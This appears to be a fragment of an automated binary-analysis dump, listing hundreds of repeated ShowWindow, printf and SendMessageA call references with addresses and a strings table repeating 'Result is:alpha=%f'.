ShowWindow.USER32(00000000,00000000), ref: 00403E63
printf.MSVCRT ref: 00403E75
SendMessageA.USER32 ref: 00403E82
ShowWindow.USER32(00000000,00000000), ref: 00403E86
printf.MSVCRT ref: 00403E98
SendMessageA.USER32 ref: 00403EA5
ShowWindow.USER32(00000000,00000000), ref: 00403EA9
printf.MSVCRT ref: 00403EBB
SendMessageA.USER32 ref: 00403EC8
ShowWindow.USER32(00000000,00000000), ref: 00403ECC
printf.MSVCRT ref: 00403EDE
SendMessageA.USER32 ref: 00403EEB
ShowWindow.USER32(00000000,00000000), ref: 00403EEF
printf.MSVCRT ref: 00403F01
SendMessageA.USER32 ref: 00403F0E
ShowWindow.USER32(00000000,00000000), ref: 00403F12
printf.MSVCRT ref: 00403F24
SendMessageA.USER32 ref: 00403F31
ShowWindow.USER32(00000000,00000000), ref: 00403F35
printf.MSVCRT ref: 00403F47
SendMessageA.USER32 ref: 00403F54
ShowWindow.USER32(00000000,00000000), ref: 00403F58
printf.MSVCRT ref: 00403F6A
SendMessageA.USER32 ref: 00403F77
ShowWindow.USER32(00000000,00000000), ref: 00403F7B
printf.MSVCRT ref: 00403F8D
SendMessageA.USER32 ref: 00403F9A
ShowWindow.USER32(00000000,00000000), ref: 00403F9E
printf.MSVCRT ref: 00403FB0
SendMessageA.USER32 ref: 00403FBD
ShowWindow.USER32(00000000,00000000), ref: 00403FC1
printf.MSVCRT ref: 00403FD3
SendMessageA.USER32 ref: 00403FE0
ShowWindow.USER32(00000000,00000000), ref: 00403FE4
printf.MSVCRT ref: 00403FF6
SendMessageA.USER32 ref: 00404003
ShowWindow.USER32(00000000,00000000), ref: 00404007
printf.MSVCRT ref: 00404019
SendMessageA.USER32 ref: 00404026
ShowWindow.USER32(00000000,00000000), ref: 0040402A
printf.MSVCRT ref: 0040403C
SendMessageA.USER32 ref: 00404049
ShowWindow.USER32(00000000,00000000), ref: 0040404D
printf.MSVCRT ref: 0040405F
SendMessageA.USER32 ref: 0040406C
ShowWindow.USER32(00000000,00000000), ref: 00404070
printf.MSVCRT ref: 00404082
SendMessageA.USER32 ref: 0040408F
ShowWindow.USER32(00000000,00000000), ref: 00404093
printf.MSVCRT ref: 004040A5
SendMessageA.USER32 ref: 004040B2
ShowWindow.USER32(00000000,00000000), ref: 004040B6
printf.MSVCRT ref: 004040C8
SendMessageA.USER32 ref: 004040D5
ShowWindow.USER32(00000000,00000000), ref: 004040D9
printf.MSVCRT ref: 004040EB
SendMessageA.USER32 ref: 004040F8
ShowWindow.USER32(00000000,00000000), ref: 004040FC
printf.MSVCRT ref: 0040410E
SendMessageA.USER32 ref: 0040411B
ShowWindow.USER32(00000000,00000000), ref: 0040411F
printf.MSVCRT ref: 00404131
SendMessageA.USER32 ref: 0040413E
ShowWindow.USER32(00000000,00000000), ref: 00404142
printf.MSVCRT ref: 00404154
SendMessageA.USER32 ref: 00404161
ShowWindow.USER32(00000000,00000000), ref: 00404165
printf.MSVCRT ref: 00404177
SendMessageA.USER32 ref: 00404184
ShowWindow.USER32(00000000,00000000), ref: 00404188
printf.MSVCRT ref: 0040419A
SendMessageA.USER32 ref: 004041A7
ShowWindow.USER32(00000000,00000000), ref: 004041AB
printf.MSVCRT ref: 004041BD
SendMessageA.USER32 ref: 004041CA
ShowWindow.USER32(00000000,00000000), ref: 004041CE
printf.MSVCRT ref: 004041E0
SendMessageA.USER32 ref: 004041ED
ShowWindow.USER32(00000000,00000000), ref: 004041F1
printf.MSVCRT ref: 00404203
SendMessageA.USER32 ref: 00404210
ShowWindow.USER32(00000000,00000000), ref: 00404214
printf.MSVCRT ref: 00404226
SendMessageA.USER32 ref: 00404233
ShowWindow.USER32(00000000,00000000), ref: 00404237
printf.MSVCRT ref: 00404249
SendMessageA.USER32 ref: 00404256
ShowWindow.USER32(00000000,00000000), ref: 0040425A
printf.MSVCRT ref: 0040426C
SendMessageA.USER32 ref: 00404279
ShowWindow.USER32(00000000,00000000), ref: 0040427D
printf.MSVCRT ref: 0040428F
SendMessageA.USER32 ref: 0040429C
ShowWindow.USER32(00000000,00000000), ref: 004042A0
printf.MSVCRT ref: 004042B2
SendMessageA.USER32 ref: 004042BF
ShowWindow.USER32(00000000,00000000), ref: 004042C3
printf.MSVCRT ref: 004042D5
SendMessageA.USER32 ref: 004042E2
ShowWindow.USER32(00000000,00000000), ref: 004042E6
printf.MSVCRT ref: 004042F8
SendMessageA.USER32 ref: 00404305
ShowWindow.USER32(00000000,00000000), ref: 00404309
printf.MSVCRT ref: 0040431B
SendMessageA.USER32 ref: 00404328
ShowWindow.USER32(00000000,00000000), ref: 0040432C
printf.MSVCRT ref: 0040433E
SendMessageA.USER32 ref: 0040434B
ShowWindow.USER32(00000000,00000000), ref: 0040434F
printf.MSVCRT ref: 00404361
SendMessageA.USER32 ref: 0040436E
ShowWindow.USER32(00000000,00000000), ref: 00404372
printf.MSVCRT ref: 00404384
SendMessageA.USER32 ref: 00404391
ShowWindow.USER32(00000000,00000000), ref: 00404395
printf.MSVCRT ref: 004043A7
SendMessageA.USER32 ref: 004043B4
ShowWindow.USER32(00000000,00000000), ref: 004043B8
printf.MSVCRT ref: 004043CA
SendMessageA.USER32 ref: 004043D7
ShowWindow.USER32(00000000,00000000), ref: 004043DB
printf.MSVCRT ref: 004043ED
SendMessageA.USER32 ref: 004043FA
ShowWindow.USER32(00000000,00000000), ref: 004043FE
printf.MSVCRT ref: 00404410
SendMessageA.USER32 ref: 0040441D
ShowWindow.USER32(00000000,00000000), ref: 00404421
printf.MSVCRT ref: 00404433
SendMessageA.USER32 ref: 00404440
ShowWindow.USER32(00000000,00000000), ref: 00404444
printf.MSVCRT ref: 00404456
SendMessageA.USER32 ref: 00404463
ShowWindow.USER32(00000000,00000000), ref: 00404467
printf.MSVCRT ref: 00404479
SendMessageA.USER32 ref: 00404486
ShowWindow.USER32(00000000,00000000), ref: 0040448A
printf.MSVCRT ref: 0040449C
SendMessageA.USER32 ref: 004044A9
ShowWindow.USER32(00000000,00000000), ref: 004044AD
printf.MSVCRT ref: 004044BF
SendMessageA.USER32 ref: 004044CC
ShowWindow.USER32(00000000,00000000), ref: 004044D0
printf.MSVCRT ref: 004044E2
SendMessageA.USER32 ref: 004044EF
ShowWindow.USER32(00000000,00000000), ref: 004044F3
printf.MSVCRT ref: 00404505
SendMessageA.USER32 ref: 00404512
ShowWindow.USER32(00000000,00000000), ref: 00404516
printf.MSVCRT ref: 00404528
SendMessageA.USER32 ref: 00404535
ShowWindow.USER32(00000000,00000000), ref: 00404539
printf.MSVCRT ref: 0040454B
SendMessageA.USER32 ref: 00404558
ShowWindow.USER32(00000000,00000000), ref: 0040455C
printf.MSVCRT ref: 0040456E
SendMessageA.USER32 ref: 0040457B
ShowWindow.USER32(00000000,00000000), ref: 0040457F
printf.MSVCRT ref: 00404591
SendMessageA.USER32 ref: 0040459E
ShowWindow.USER32(00000000,00000000), ref: 004045A2
printf.MSVCRT ref: 004045B4
SendMessageA.USER32 ref: 004045C1
ShowWindow.USER32(00000000,00000000), ref: 004045C5
printf.MSVCRT ref: 004045D7
SendMessageA.USER32 ref: 004045E4
ShowWindow.USER32(00000000,00000000), ref: 004045E8
printf.MSVCRT ref: 004045FA
SendMessageA.USER32 ref: 00404607
ShowWindow.USER32(00000000,00000000), ref: 0040460B
printf.MSVCRT ref: 0040461D
SendMessageA.USER32 ref: 0040462A
ShowWindow.USER32(00000000,00000000), ref: 0040462E
printf.MSVCRT ref: 00404640
SendMessageA.USER32 ref: 0040464D
ShowWindow.USER32(00000000,00000000), ref: 00404651
printf.MSVCRT ref: 00404663
SendMessageA.USER32 ref: 00404670
ShowWindow.USER32(00000000,00000000), ref: 00404674
printf.MSVCRT ref: 00404686
SendMessageA.USER32 ref: 00404693
ShowWindow.USER32(00000000,00000000), ref: 00404697
printf.MSVCRT ref: 004046A9
SendMessageA.USER32 ref: 004046B6
ShowWindow.USER32(00000000,00000000), ref: 004046BA
printf.MSVCRT ref: 004046CC
SendMessageA.USER32 ref: 004046D9
ShowWindow.USER32(00000000,00000000), ref: 004046DD
printf.MSVCRT ref: 004046EF
SendMessageA.USER32 ref: 004046FC
ShowWindow.USER32(00000000,00000000), ref: 00404700
printf.MSVCRT ref: 00404712
SendMessageA.USER32 ref: 0040471F
ShowWindow.USER32(00000000,00000000), ref: 00404723
printf.MSVCRT ref: 00404735
SendMessageA.USER32 ref: 00404742
ShowWindow.USER32(00000000,00000000), ref: 00404746
printf.MSVCRT ref: 00404758
SendMessageA.USER32 ref: 00404765
ShowWindow.USER32(00000000,00000000), ref: 00404769
printf.MSVCRT ref: 0040477B
SendMessageA.USER32 ref: 00404788
ShowWindow.USER32(00000000,00000000), ref: 0040478C
printf.MSVCRT ref: 0040479E
SendMessageA.USER32 ref: 004047AB
ShowWindow.USER32(00000000,00000000), ref: 004047AF
printf.MSVCRT ref: 004047C1
SendMessageA.USER32 ref: 004047CE
ShowWindow.USER32(00000000,00000000), ref: 004047D2
printf.MSVCRT ref: 004047E4
SendMessageA.USER32 ref: 004047F1
ShowWindow.USER32(00000000,00000000), ref: 004047F5
printf.MSVCRT ref: 00404807
SendMessageA.USER32 ref: 00404814
ShowWindow.USER32(00000000,00000000), ref: 00404818
printf.MSVCRT ref: 0040482A
SendMessageA.USER32 ref: 00404837
ShowWindow.USER32(00000000,00000000), ref: 0040483B
printf.MSVCRT ref: 0040484D
SendMessageA.USER32 ref: 0040485A
ShowWindow.USER32(00000000,00000000), ref: 0040485E
printf.MSVCRT ref: 00404870
SendMessageA.USER32 ref: 0040487D
ShowWindow.USER32(00000000,00000000), ref: 00404881
printf.MSVCRT ref: 00404893
SendMessageA.USER32 ref: 004048A0
ShowWindow.USER32(00000000,00000000), ref: 004048A4
printf.MSVCRT ref: 004048B6
SendMessageA.USER32 ref: 004048C3
ShowWindow.USER32(00000000,00000000), ref: 004048C7
printf.MSVCRT ref: 004048D9
SendMessageA.USER32 ref: 004048E6
ShowWindow.USER32(00000000,00000000), ref: 004048EA
printf.MSVCRT ref: 004048FC
SendMessageA.USER32 ref: 00404909
ShowWindow.USER32(00000000,00000000), ref: 0040490D
printf.MSVCRT ref: 0040491F
SendMessageA.USER32 ref: 0040492C
ShowWindow.USER32(00000000,00000000), ref: 00404930
printf.MSVCRT ref: 00404942
SendMessageA.USER32 ref: 0040494F
ShowWindow.USER32(00000000,00000000), ref: 00404953
printf.MSVCRT ref: 00404965
SendMessageA.USER32 ref: 00404972
ShowWindow.USER32(00000000,00000000), ref: 00404976
printf.MSVCRT ref: 00404988
SendMessageA.USER32 ref: 00404995
ShowWindow.USER32(00000000,00000000), ref: 00404999
printf.MSVCRT ref: 004049AB
SendMessageA.USER32 ref: 004049B8
ShowWindow.USER32(00000000,00000000), ref: 004049BC
printf.MSVCRT ref: 004049CE
SendMessageA.USER32 ref: 004049DB
ShowWindow.USER32(00000000,00000000), ref: 004049DF
printf.MSVCRT ref: 004049F1
SendMessageA.USER32 ref: 004049FE
ShowWindow.USER32(00000000,00000000), ref: 00404A02
printf.MSVCRT ref: 00404A14
SendMessageA.USER32 ref: 00404A21
ShowWindow.USER32(00000000,00000000), ref: 00404A25
printf.MSVCRT ref: 00404A37
SendMessageA.USER32 ref: 00404A44
ShowWindow.USER32(00000000,00000000), ref: 00404A48
printf.MSVCRT ref: 00404A5A
SendMessageA.USER32 ref: 00404A67
ShowWindow.USER32(00000000,00000000), ref: 00404A6B
printf.MSVCRT ref: 00404A7D
SendMessageA.USER32 ref: 00404A8A
ShowWindow.USER32(00000000,00000000), ref: 00404A8E
printf.MSVCRT ref: 00404AA0
SendMessageA.USER32 ref: 00404AAD
ShowWindow.USER32(00000000,00000000), ref: 00404AB1
printf.MSVCRT ref: 00404AC3
SendMessageA.USER32 ref: 00404AD0
ShowWindow.USER32(00000000,00000000), ref: 00404AD4
printf.MSVCRT ref: 00404AE6
SendMessageA.USER32 ref: 00404AF3
ShowWindow.USER32(00000000,00000000), ref: 00404AF7
printf.MSVCRT ref: 00404B09
SendMessageA.USER32 ref: 00404B16
ShowWindow.USER32(00000000,00000000), ref: 00404B1A
printf.MSVCRT ref: 00404B2C
SendMessageA.USER32 ref: 00404B39
ShowWindow.USER32(00000000,00000000), ref: 00404B3D
printf.MSVCRT ref: 00404B4F
SendMessageA.USER32 ref: 00404B5C
ShowWindow.USER32(00000000,00000000), ref: 00404B60
printf.MSVCRT ref: 00404B72
SendMessageA.USER32 ref: 00404B7F
ShowWindow.USER32(00000000,00000000), ref: 00404B83
printf.MSVCRT ref: 00404B95
SendMessageA.USER32 ref: 00404BA2
ShowWindow.USER32(00000000,00000000), ref: 00404BA6
printf.MSVCRT ref: 00404BB8
SendMessageA.USER32 ref: 00404BC5
ShowWindow.USER32(00000000,00000000), ref: 00404BC9
printf.MSVCRT ref: 00404BDB
SendMessageA.USER32 ref: 00404BE8
ShowWindow.USER32(00000000,00000000), ref: 00404BEC
printf.MSVCRT ref: 00404BFE
SendMessageA.USER32 ref: 00404C0B
ShowWindow.USER32(00000000,00000000), ref: 00404C0F
printf.MSVCRT ref: 00404C21
SendMessageA.USER32 ref: 00404C2E
ShowWindow.USER32(00000000,00000000), ref: 00404C32
printf.MSVCRT ref: 00404C44
SendMessageA.USER32 ref: 00404C51
ShowWindow.USER32(00000000,00000000), ref: 00404C55
printf.MSVCRT ref: 00404C67
SendMessageA.USER32 ref: 00404C74
ShowWindow.USER32(00000000,00000000), ref: 00404C78
printf.MSVCRT ref: 00404C8A
SendMessageA.USER32 ref: 00404C97
ShowWindow.USER32(00000000,00000000), ref: 00404C9B
printf.MSVCRT ref: 00404CAD
SendMessageA.USER32 ref: 00404CBA
ShowWindow.USER32(00000000,00000000), ref: 00404CBE
printf.MSVCRT ref: 00404CD0
SendMessageA.USER32 ref: 00404CDD
ShowWindow.USER32(00000000,00000000), ref: 00404CE1
printf.MSVCRT ref: 00404CF3
SendMessageA.USER32 ref: 00404D00
ShowWindow.USER32(00000000,00000000), ref: 00404D04
printf.MSVCRT ref: 00404D16
SendMessageA.USER32 ref: 00404D23
ShowWindow.USER32(00000000,00000000), ref: 00404D27
printf.MSVCRT ref: 00404D39
SendMessageA.USER32 ref: 00404D46
ShowWindow.USER32(00000000,00000000), ref: 00404D4A
printf.MSVCRT ref: 00404D5C
SendMessageA.USER32 ref: 00404D69
ShowWindow.USER32(00000000,00000000), ref: 00404D6D
printf.MSVCRT ref: 00404D7F
SendMessageA.USER32 ref: 00404D8C
ShowWindow.USER32(00000000,00000000), ref: 00404D90
printf.MSVCRT ref: 00404DA2
SendMessageA.USER32 ref: 00404DAF
ShowWindow.USER32(00000000,00000000), ref: 00404DB3
printf.MSVCRT ref: 00404DC5
SendMessageA.USER32 ref: 00404DD2
ShowWindow.USER32(00000000,00000000), ref: 00404DD6
printf.MSVCRT ref: 00404DE8
SendMessageA.USER32 ref: 00404DF5
ShowWindow.USER32(00000000,00000000), ref: 00404DF9
printf.MSVCRT ref: 00404E0B
SendMessageA.USER32 ref: 00404E18
ShowWindow.USER32(00000000,00000000), ref: 00404E1C
printf.MSVCRT ref: 00404E2E
SendMessageA.USER32 ref: 00404E3B
ShowWindow.USER32(00000000,00000000), ref: 00404E3F
printf.MSVCRT ref: 00404E51
SendMessageA.USER32 ref: 00404E5E
ShowWindow.USER32(00000000,00000000), ref: 00404E62
printf.MSVCRT ref: 00404E74
SendMessageA.USER32 ref: 00404E81
ShowWindow.USER32(00000000,00000000), ref: 00404E85
printf.MSVCRT ref: 00404E97
SendMessageA.USER32 ref: 00404EA4
ShowWindow.USER32(00000000,00000000), ref: 00404EA8
printf.MSVCRT ref: 00404EBA
SendMessageA.USER32 ref: 00404EC7
ShowWindow.USER32(00000000,00000000), ref: 00404ECB
printf.MSVCRT ref: 00404EDD
SendMessageA.USER32 ref: 00404EEA
ShowWindow.USER32(00000000,00000000), ref: 00404EEE
printf.MSVCRT ref: 00404F00
SendMessageA.USER32 ref: 00404F0D
ShowWindow.USER32(00000000,00000000), ref: 00404F11
printf.MSVCRT ref: 00404F23
SendMessageA.USER32 ref: 00404F30
ShowWindow.USER32(00000000,00000000), ref: 00404F34
printf.MSVCRT ref: 00404F46
SendMessageA.USER32 ref: 00404F53
ShowWindow.USER32(00000000,00000000), ref: 00404F57
printf.MSVCRT ref: 00404F69
SendMessageA.USER32 ref: 00404F76
ShowWindow.USER32(00000000,00000000), ref: 00404F7A
printf.MSVCRT ref: 00404F8C
SendMessageA.USER32 ref: 00404F99
ShowWindow.USER32(00000000,00000000), ref: 00404F9D
printf.MSVCRT ref: 00404FAF
SendMessageA.USER32 ref: 00404FBC
ShowWindow.USER32(00000000,00000000), ref: 00404FC0
printf.MSVCRT ref: 00404FD2
SendMessageA.USER32 ref: 00404FDF
ShowWindow.USER32(00000000,00000000), ref: 00404FE3
printf.MSVCRT ref: 00404FF5
SendMessageA.USER32 ref: 00405002
ShowWindow.USER32(00000000,00000000), ref: 00405006
printf.MSVCRT ref: 00405018
SendMessageA.USER32 ref: 00405025
ShowWindow.USER32(00000000,00000000), ref: 00405029
printf.MSVCRT ref: 0040503B
SendMessageA.USER32 ref: 00405048
ShowWindow.USER32(00000000,00000000), ref: 0040504C
printf.MSVCRT ref: 0040505E
SendMessageA.USER32 ref: 0040506B
ShowWindow.USER32(00000000,00000000), ref: 0040506F
printf.MSVCRT ref: 00405081
SendMessageA.USER32 ref: 0040508E
ShowWindow.USER32(00000000,00000000), ref: 00405092
printf.MSVCRT ref: 004050A4
SendMessageA.USER32 ref: 004050B1
ShowWindow.USER32(00000000,00000000), ref: 004050B5
printf.MSVCRT ref: 004050C7
SendMessageA.USER32 ref: 004050D4
ShowWindow.USER32(00000000,00000000), ref: 004050D8
printf.MSVCRT ref: 004050EA
SendMessageA.USER32 ref: 004050F7
ShowWindow.USER32(00000000,00000000), ref: 004050FB
printf.MSVCRT ref: 0040510D
SendMessageA.USER32 ref: 0040511A
ShowWindow.USER32(00000000,00000000), ref: 0040511E
printf.MSVCRT ref: 00405130
SendMessageA.USER32 ref: 0040513D
ShowWindow.USER32(00000000,00000000), ref: 00405141
printf.MSVCRT ref: 00405153
SendMessageA.USER32 ref: 00405160
ShowWindow.USER32(00000000,00000000), ref: 00405164
printf.MSVCRT ref: 00405176
SendMessageA.USER32 ref: 00405183
ShowWindow.USER32(00000000,00000000), ref: 00405187
printf.MSVCRT ref: 00405199
SendMessageA.USER32 ref: 004051A6
ShowWindow.USER32(00000000,00000000), ref: 004051AA
printf.MSVCRT ref: 004051BC
SendMessageA.USER32 ref: 004051C9
ShowWindow.USER32(00000000,00000000), ref: 004051CD
printf.MSVCRT ref: 004051DF
SendMessageA.USER32 ref: 004051EC
ShowWindow.USER32(00000000,00000000), ref: 004051F0
printf.MSVCRT ref: 00405202
SendMessageA.USER32 ref: 0040520F
ShowWindow.USER32(00000000,00000000), ref: 00405213
printf.MSVCRT ref: 00405225
SendMessageA.USER32 ref: 00405232
ShowWindow.USER32(00000000,00000000), ref: 00405236
printf.MSVCRT ref: 00405248
SendMessageA.USER32 ref: 00405255
ShowWindow.USER32(00000000,00000000), ref: 00405259
printf.MSVCRT ref: 0040526B
SendMessageA.USER32 ref: 00405278
ShowWindow.USER32(00000000,00000000), ref: 0040527C
printf.MSVCRT ref: 0040528E
SendMessageA.USER32 ref: 0040529B
ShowWindow.USER32(00000000,00000000), ref: 0040529F
printf.MSVCRT ref: 004052B1
SendMessageA.USER32 ref: 004052BE
ShowWindow.USER32(00000000,00000000), ref: 004052C2
printf.MSVCRT ref: 004052D4
SendMessageA.USER32 ref: 004052E1
ShowWindow.USER32(00000000,00000000), ref: 004052E5
printf.MSVCRT ref: 004052F7
SendMessageA.USER32 ref: 00405304
ShowWindow.USER32(00000000,00000000), ref: 00405308
printf.MSVCRT ref: 0040531A
SendMessageA.USER32 ref: 00405327
ShowWindow.USER32(00000000,00000000), ref: 0040532B
printf.MSVCRT ref: 0040533D
SendMessageA.USER32 ref: 0040534A
ShowWindow.USER32(00000000,00000000), ref: 0040534E
printf.MSVCRT ref: 00405360
SendMessageA.USER32 ref: 0040536D
ShowWindow.USER32(00000000,00000000), ref: 00405371
printf.MSVCRT ref: 00405383
SendMessageA.USER32 ref: 00405390
ShowWindow.USER32(00000000,00000000), ref: 00405394
printf.MSVCRT ref: 004053A6
SendMessageA.USER32 ref: 004053B3
ShowWindow.USER32(00000000,00000000), ref: 004053B7
printf.MSVCRT ref: 004053C9
SendMessageA.USER32 ref: 004053D6
ShowWindow.USER32(00000000,00000000), ref: 004053DA
printf.MSVCRT ref: 004053EC
SendMessageA.USER32 ref: 004053F9
ShowWindow.USER32(00000000,00000000), ref: 004053FD
printf.MSVCRT ref: 0040540F
SendMessageA.USER32 ref: 0040541C
ShowWindow.USER32(00000000,00000000), ref: 00405420
printf.MSVCRT ref: 00405432
SendMessageA.USER32 ref: 0040543F
ShowWindow.USER32(00000000,00000000), ref: 00405443
printf.MSVCRT ref: 00405455
SendMessageA.USER32 ref: 00405462
ShowWindow.USER32(00000000,00000000), ref: 00405466
printf.MSVCRT ref: 00405478
SendMessageA.USER32 ref: 00405485
ShowWindow.USER32(00000000,00000000), ref: 00405489
printf.MSVCRT ref: 0040549B
SendMessageA.USER32 ref: 004054A8
ShowWindow.USER32(00000000,00000000), ref: 004054AC
printf.MSVCRT ref: 004054BE
SendMessageA.USER32 ref: 004054CB
ShowWindow.USER32(00000000,00000000), ref: 004054CF
printf.MSVCRT ref: 004054E1
SendMessageA.USER32 ref: 004054EE
ShowWindow.USER32(00000000,00000000), ref: 004054F2
printf.MSVCRT ref: 00405504
SendMessageA.USER32 ref: 00405511
ShowWindow.USER32(00000000,00000000), ref: 00405515
printf.MSVCRT ref: 00405527
SendMessageA.USER32 ref: 00405534
ShowWindow.USER32(00000000,00000000), ref: 00405538
printf.MSVCRT ref: 0040554A
SendMessageA.USER32 ref: 00405557
ShowWindow.USER32(00000000,00000000), ref: 0040555B
printf.MSVCRT ref: 0040556D
SendMessageA.USER32 ref: 0040557A
ShowWindow.USER32(00000000,00000000), ref: 0040557E
printf.MSVCRT ref: 00405590
SendMessageA.USER32 ref: 0040559D
ShowWindow.USER32(00000000,00000000), ref: 004055A1
printf.MSVCRT ref: 004055B3
SendMessageA.USER32 ref: 004055C0
ShowWindow.USER32(00000000,00000000), ref: 004055C4
printf.MSVCRT ref: 004055D6
SendMessageA.USER32 ref: 004055E3
ShowWindow.USER32(00000000,00000000), ref: 004055E7
printf.MSVCRT ref: 004055F9
SendMessageA.USER32 ref: 00405606
ShowWindow.USER32(00000000,00000000), ref: 0040560A
printf.MSVCRT ref: 0040561C
SendMessageA.USER32 ref: 00405629
ShowWindow.USER32(00000000,00000000), ref: 0040562D
printf.MSVCRT ref: 0040563F
SendMessageA.USER32 ref: 0040564C
ShowWindow.USER32(00000000,00000000), ref: 00405650
printf.MSVCRT ref: 00405662
SendMessageA.USER32 ref: 0040566F
ShowWindow.USER32(00000000,00000000), ref: 00405673
printf.MSVCRT ref: 00405685
SendMessageA.USER32 ref: 00405692
ShowWindow.USER32(00000000,00000000), ref: 00405696
printf.MSVCRT ref: 004056A8
SendMessageA.USER32 ref: 004056B5
ShowWindow.USER32(00000000,00000000), ref: 004056B9
printf.MSVCRT ref: 004056CB
SendMessageA.USER32 ref: 004056D8
ShowWindow.USER32(00000000,00000000), ref: 004056DC
printf.MSVCRT ref: 004056EE
SendMessageA.USER32 ref: 004056FB
ShowWindow.USER32(00000000,00000000), ref: 004056FF
printf.MSVCRT ref: 00405711
SendMessageA.USER32 ref: 0040571E
ShowWindow.USER32(00000000,00000000), ref: 00405722
printf.MSVCRT ref: 00405734
SendMessageA.USER32 ref: 00405741
ShowWindow.USER32(00000000,00000000), ref: 00405745
printf.MSVCRT ref: 00405757
SendMessageA.USER32 ref: 00405764
ShowWindow.USER32(00000000,00000000), ref: 00405768
printf.MSVCRT ref: 0040577A
SendMessageA.USER32 ref: 00405787
ShowWindow.USER32(00000000,00000000), ref: 0040578B
printf.MSVCRT ref: 0040579D
SendMessageA.USER32 ref: 004057AA
ShowWindow.USER32(00000000,00000000), ref: 004057AE
printf.MSVCRT ref: 004057C0
SendMessageA.USER32 ref: 004057CD
ShowWindow.USER32(00000000,00000000), ref: 004057D1
printf.MSVCRT ref: 004057E3
SendMessageA.USER32 ref: 004057F0
ShowWindow.USER32(00000000,00000000), ref: 004057F4
printf.MSVCRT ref: 00405806
SendMessageA.USER32 ref: 00405813
ShowWindow.USER32(00000000,00000000), ref: 00405817
printf.MSVCRT ref: 00405829
SendMessageA.USER32 ref: 00405836
ShowWindow.USER32(00000000,00000000), ref: 0040583A
printf.MSVCRT ref: 0040584C
SendMessageA.USER32 ref: 00405859
ShowWindow.USER32(00000000,00000000), ref: 0040585D
printf.MSVCRT ref: 0040586F
SendMessageA.USER32 ref: 0040587C
ShowWindow.USER32(00000000,00000000), ref: 00405880
printf.MSVCRT ref: 00405892
SendMessageA.USER32 ref: 0040589F
ShowWindow.USER32(00000000,00000000), ref: 004058A3
printf.MSVCRT ref: 004058B5
SendMessageA.USER32 ref: 004058C2
ShowWindow.USER32(00000000,00000000), ref: 004058C6
printf.MSVCRT ref: 004058D8
SendMessageA.USER32 ref: 004058E5
ShowWindow.USER32(00000000,00000000), ref: 004058E9
printf.MSVCRT ref: 004058FB
SendMessageA.USER32 ref: 00405908
ShowWindow.USER32(00000000,00000000), ref: 0040590C
printf.MSVCRT ref: 0040591E
SendMessageA.USER32 ref: 0040592B
ShowWindow.USER32(00000000,00000000), ref: 0040592F
printf.MSVCRT ref: 00405941
SendMessageA.USER32 ref: 0040594E
ShowWindow.USER32(00000000,00000000), ref: 00405952
printf.MSVCRT ref: 00405964
SendMessageA.USER32 ref: 00405971
ShowWindow.USER32(00000000,00000000), ref: 00405975
printf.MSVCRT ref: 00405987
SendMessageA.USER32 ref: 00405994
ShowWindow.USER32(00000000,00000000), ref: 00405998
printf.MSVCRT ref: 004059AA
SendMessageA.USER32 ref: 004059B7
ShowWindow.USER32(00000000,00000000), ref: 004059BB
printf.MSVCRT ref: 004059CD
SendMessageA.USER32 ref: 004059DA
ShowWindow.USER32(00000000,00000000), ref: 004059DE
printf.MSVCRT ref: 004059F0
SendMessageA.USER32 ref: 004059FD
ShowWindow.USER32(00000000,00000000), ref: 00405A01
printf.MSVCRT ref: 00405A13
SendMessageA.USER32 ref: 00405A20
ShowWindow.USER32(00000000,00000000), ref: 00405A24
printf.MSVCRT ref: 00405A36
SendMessageA.USER32 ref: 00405A43
ShowWindow.USER32(00000000,00000000), ref: 00405A47
printf.MSVCRT ref: 00405A59
SendMessageA.USER32 ref: 00405A66
ShowWindow.USER32(00000000,00000000), ref: 00405A6A
printf.MSVCRT ref: 00405A7C
SendMessageA.USER32 ref: 00405A89
ShowWindow.USER32(00000000,00000000), ref: 00405A8D
printf.MSVCRT ref: 00405A9F
SendMessageA.USER32 ref: 00405AAC
ShowWindow.USER32(00000000,00000000), ref: 00405AB0
printf.MSVCRT ref: 00405AC2
SendMessageA.USER32 ref: 00405ACF
ShowWindow.USER32(00000000,00000000), ref: 00405AD3
printf.MSVCRT ref: 00405AE5
SendMessageA.USER32 ref: 00405AF2
ShowWindow.USER32(00000000,00000000), ref: 00405AF6
printf.MSVCRT ref: 00405B08
SendMessageA.USER32 ref: 00405B15
ShowWindow.USER32(00000000,00000000), ref: 00405B19
printf.MSVCRT ref: 00405B2B
SendMessageA.USER32 ref: 00405B38
ShowWindow.USER32(00000000,00000000), ref: 00405B3C
printf.MSVCRT ref: 00405B4E
SendMessageA.USER32 ref: 00405B5B
ShowWindow.USER32(00000000,00000000), ref: 00405B5F
printf.MSVCRT ref: 00405B71
SendMessageA.USER32 ref: 00405B7E
ShowWindow.USER32(00000000,00000000), ref: 00405B82
printf.MSVCRT ref: 00405B94
SendMessageA.USER32 ref: 00405BA1
ShowWindow.USER32(00000000,00000000), ref: 00405BA5
printf.MSVCRT ref: 00405BB7
SendMessageA.USER32 ref: 00405BC4
ShowWindow.USER32(00000000,00000000), ref: 00405BC8
printf.MSVCRT ref: 00405BDA
SendMessageA.USER32 ref: 00405BE7
ShowWindow.USER32(00000000,00000000), ref: 00405BEB
printf.MSVCRT ref: 00405BFD
SendMessageA.USER32 ref: 00405C0A
ShowWindow.USER32(00000000,00000000), ref: 00405C0E
printf.MSVCRT ref: 00405C20
SendMessageA.USER32 ref: 00405C2D
ShowWindow.USER32(00000000,00000000), ref: 00405C31

Strings

Result is:alpha=%f, xrefs: 00404221
Result is:alpha=%f, xrefs: 004054FF
Result is:alpha=%f, xrefs: 0040435C
Result is:alpha=%f, xrefs: 00403B28
Result is:alpha=%f, xrefs: 00404B27
Result is:alpha=%f, xrefs: 00404776
Result is:alpha=%f, xrefs: 00404339
Result is:alpha=%f, xrefs: 0040379A
Result is:alpha=%f, xrefs: 00405B49
Result is:alpha=%f, xrefs: 00405450
Result is:alpha=%f, xrefs: 00403A56
Result is:alpha=%f, xrefs: 00404802
Result is:alpha=%f, xrefs: 00403FF1
Result is:alpha=%f, xrefs: 00405A77
Result is:alpha=%f, xrefs: 004041B8
Result is:alpha=%f, xrefs: 00404DC0
Result is:alpha=%f, xrefs: 00404172
Result is:alpha=%f, xrefs: 00405AE0
Result is:alpha=%f, xrefs: 00403FAB
Result is:alpha=%f, xrefs: 00405919
Result is:alpha=%f, xrefs: 00405266
Result is:alpha=%f, xrefs: 00403B05
Result is:alpha=%f, xrefs: 004040C3
Result is:alpha=%f, xrefs: 004046C7
Result is:alpha=%f, xrefs: 004047BC
Result is:alpha=%f, xrefs: 00403B91
Result is:alpha=%f, xrefs: 00405220
Result is:alpha=%f, xrefs: 004039CA
